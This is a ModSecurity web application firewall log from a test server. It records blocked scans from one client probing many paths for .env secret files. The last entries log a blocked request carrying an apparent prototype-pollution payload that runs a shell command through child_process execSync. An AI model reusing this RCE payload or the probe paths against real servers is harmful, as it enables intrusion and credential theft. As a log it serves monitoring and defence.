[Thu Jan 08 21:18:43.154459 2026] [:error] [pid 1270039] [client 18.119.100.98:43926] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.staging"] [unique_id "aWARI5ccQYhM1DUhi_W7GgAAAAQ"]
[Thu Jan 08 21:18:43.503188 2026] [:error] [pid 1270043] [client 18.119.100.98:44056] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.production"] [unique_id "aWARIwvEr1EpOYnVfM6r1QAAAAc"]
[Thu Jan 08 21:18:43.503396 2026] [:error] [pid 1270043] [client 18.119.100.98:44056] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.production"] [unique_id "aWARIwvEr1EpOYnVfM6r1QAAAAc"]
[Thu Jan 08 21:18:43.503556 2026] [:error] [pid 1270043] [client 18.119.100.98:44056] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.production"] [unique_id "aWARIwvEr1EpOYnVfM6r1QAAAAc"]
[Thu Jan 08 21:18:43.849384 2026] [:error] [pid 1270035] [client 18.119.100.98:44198] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.production"] [unique_id "aWARIyYqm_i2BUcmtQb4ygAAAAA"]
[Thu Jan 08 21:18:43.850296 2026] [:error] [pid 1270035] [client 18.119.100.98:44198] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.production"] [unique_id "aWARIyYqm_i2BUcmtQb4ygAAAAA"]
[Thu Jan 08 21:18:43.850470 2026] [:error] [pid 1270035] [client 18.119.100.98:44198] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.production"] [unique_id "aWARIyYqm_i2BUcmtQb4ygAAAAA"]
[Thu Jan 08 21:18:44.198148 2026] [:error] [pid 1270041] [client 18.119.100.98:44350] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.production"] [unique_id "aWARJM3GwEx_BV8-CrWUVgAAAAU"]
[Thu Jan 08 21:18:44.198388 2026] [:error] [pid 1270041] [client 18.119.100.98:44350] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.production"] [unique_id "aWARJM3GwEx_BV8-CrWUVgAAAAU"]
[Thu Jan 08 21:18:44.198549 2026] [:error] [pid 1270041] [client 18.119.100.98:44350] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/live/.env.production"] [unique_id "aWARJM3GwEx_BV8-CrWUVgAAAAU"]
[Thu Jan 08 21:18:44.548330 2026] [:error] [pid 1283304] [client 18.119.100.98:44490] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env"] [unique_id "aWARJGAwUIZgFNkik8yVTQAAAAg"]
[Thu Jan 08 21:18:44.548552 2026] [:error] [pid 1283304] [client 18.119.100.98:44490] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env"] [unique_id "aWARJGAwUIZgFNkik8yVTQAAAAg"]
[Thu Jan 08 21:18:44.548745 2026] [:error] [pid 1283304] [client 18.119.100.98:44490] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env"] [unique_id "aWARJGAwUIZgFNkik8yVTQAAAAg"]
[Thu Jan 08 21:18:44.898852 2026] [authz_core:error] [pid 1270042] [client 18.119.100.98:44632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci
[Thu Jan 08 21:18:45.249884 2026] [:error] [pid 1270036] [client 18.119.100.98:44772] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env"] [unique_id "aWARJeM1154Q6b0hewij9gAAAAE"]
[Thu Jan 08 21:18:45.250108 2026] [:error] [pid 1270036] [client 18.119.100.98:44772] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env"] [unique_id "aWARJeM1154Q6b0hewij9gAAAAE"]
[Thu Jan 08 21:18:45.250269 2026] [:error] [pid 1270036] [client 18.119.100.98:44772] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env"] [unique_id "aWARJeM1154Q6b0hewij9gAAAAE"]
[Thu Jan 08 21:18:45.593791 2026] [:error] [pid 1270037] [client 18.119.100.98:44928] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.production"] [unique_id "aWARJeA_IfWyU2EIiRhOlgAAAAI"]
[Thu Jan 08 21:18:45.594007 2026] [:error] [pid 1270037] [client 18.119.100.98:44928] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.production"] [unique_id "aWARJeA_IfWyU2EIiRhOlgAAAAI"]
[Thu Jan 08 21:18:45.594167 2026] [:error] [pid 1270037] [client 18.119.100.98:44928] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.production"] [unique_id "aWARJeA_IfWyU2EIiRhOlgAAAAI"]
[Thu Jan 08 21:18:45.940427 2026] [:error] [pid 1280390] [client 18.119.100.98:45068] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.local"] [unique_id "aWARJdKTJIy7S9W5nL2LUQAAAAk"]
[Thu Jan 08 21:18:45.940635 2026] [:error] [pid 1280390] [client 18.119.100.98:45068] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.local"] [unique_id "aWARJdKTJIy7S9W5nL2LUQAAAAk"]
[Thu Jan 08 21:18:45.940788 2026] [:error] [pid 1280390] [client 18.119.100.98:45068] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.local"] [unique_id "aWARJdKTJIy7S9W5nL2LUQAAAAk"]
[Thu Jan 08 21:18:46.286204 2026] [:error] [pid 1270038] [client 18.119.100.98:45216] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aWARJhmwMJtANIcuNUXpNgAAAAM"]
[Thu Jan 08 21:18:46.286442 2026] [:error] [pid 1270038] [client 18.119.100.98:45216] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aWARJhmwMJtANIcuNUXpNgAAAAM"]
[Thu Jan 08 21:18:46.286619 2026] [:error] [pid 1270038] [client 18.119.100.98:45216] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aWARJhmwMJtANIcuNUXpNgAAAAM"]
[Thu Jan 08 21:18:46.633819 2026] [:error] [pid 1270039] [client 18.119.100.98:45366] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.production"] [unique_id "aWARJpccQYhM1DUhi_W7GwAAAAQ"]
[Thu Jan 08 21:18:46.634027 2026] [:error] [pid 1270039] [client 18.119.100.98:45366] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.production"] [unique_id "aWARJpccQYhM1DUhi_W7GwAAAAQ"]
[Thu Jan 08 21:18:46.634184 2026] [:error] [pid 1270039] [client 18.119.100.98:45366] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.production"] [unique_id "aWARJpccQYhM1DUhi_W7GwAAAAQ"]
[Thu Jan 08 21:18:46.983545 2026] [:error] [pid 1270043] [client 18.119.100.98:45522] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env"] [unique_id "aWARJgvEr1EpOYnVfM6r1gAAAAc"]
[Thu Jan 08 21:18:46.983756 2026] [:error] [pid 1270043] [client 18.119.100.98:45522] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env"] [unique_id "aWARJgvEr1EpOYnVfM6r1gAAAAc"]
[Thu Jan 08 21:18:46.983923 2026] [:error] [pid 1270043] [client 18.119.100.98:45522] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env"] [unique_id "aWARJgvEr1EpOYnVfM6r1gAAAAc"]
[Thu Jan 08 21:18:47.339290 2026] [:error] [pid 1270035] [client 18.119.100.98:45684] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.staging"] [unique_id "aWARJyYqm_i2BUcmtQb4ywAAAAA"]
[Thu Jan 08 21:18:47.339501 2026] [:error] [pid 1270035] [client 18.119.100.98:45684] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.staging"] [unique_id "aWARJyYqm_i2BUcmtQb4ywAAAAA"]
[Thu Jan 08 21:18:47.339662 2026] [:error] [pid 1270035] [client 18.119.100.98:45684] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.staging"] [unique_id "aWARJyYqm_i2BUcmtQb4ywAAAAA"]
[Thu Jan 08 21:18:47.689489 2026] [:error] [pid 1270041] [client 18.119.100.98:45830] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.production"] [unique_id "aWARJ83GwEx_BV8-CrWUVwAAAAU"]
[Thu Jan 08 21:18:47.689710 2026] [:error] [pid 1270041] [client 18.119.100.98:45830] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.production"] [unique_id "aWARJ83GwEx_BV8-CrWUVwAAAAU"]
[Thu Jan 08 21:18:47.689880 2026] [:error] [pid 1270041] [client 18.119.100.98:45830] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.production"] [unique_id "aWARJ83GwEx_BV8-CrWUVwAAAAU"]
[Thu Jan 08 23:53:59.095507 2026] [:error] [pid 1270043] [client 13.235.91.142:51390] [client 13.235.91.142] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271))) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271))).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWA1hwvEr1EpOYnVfM6r5gAAAAc"]
[Thu Jan 08 23:53:59.096819 2026] [:error] [pid 1270043] [client 13.235.91.142:51390] [client 13.235.91.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWA1hwvEr1EpOYnVfM6r5gAAAAc"]
[Thu Jan 08 23:53:59.096972 2026] [:error] [pid 1270043] [client 13.235.91.142:51390] [client 13.235.91.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWA1hwvEr1EpOYnVfM6r5gAAAAc"]
